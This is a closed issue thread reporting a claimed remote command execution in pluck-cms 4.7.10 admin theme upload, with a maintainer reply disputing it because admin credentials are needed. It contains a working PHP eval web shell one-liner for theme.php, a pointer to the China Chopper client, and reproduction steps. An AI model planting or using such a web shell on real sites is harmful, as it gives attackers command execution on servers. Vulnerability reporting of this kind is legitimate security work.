Closed SecurityCN closed 5 years ago
Add the following code to theme.php to getshell
; phpinfo(); ?>
<?php @eval($_POST[c]);
Use chopper connect
This is not an exploit. This like inserting the text hacked in the page.. there is no way to upload the theme without knowing the password, and there is no way into tricking an unsuspecting victim to fall for this.
pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme Demo: After the installation is successful, go to the management background. options->choose theme->install theme
vul-url: http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall According to the default template, the theme is faked with the content of the theme shell.php.zip as follows: Insert phpinfo(); in the theme.php file;
upload
1.default theme
View site
2.choose shell.php theme
View site http://192.168.80.1/pluck-4.7.10-dev3/
phpinfo();Function is executed
The vulnerability exists in the latest pluck-4.7.10-dev2 pluck-4.7.10-dev3. The pluck-4.7.10-dev4 version cannot be uploaded due to bugs in the program, but in theory the RCE vulnerability exists. In pluck-4.7.10-dev4 version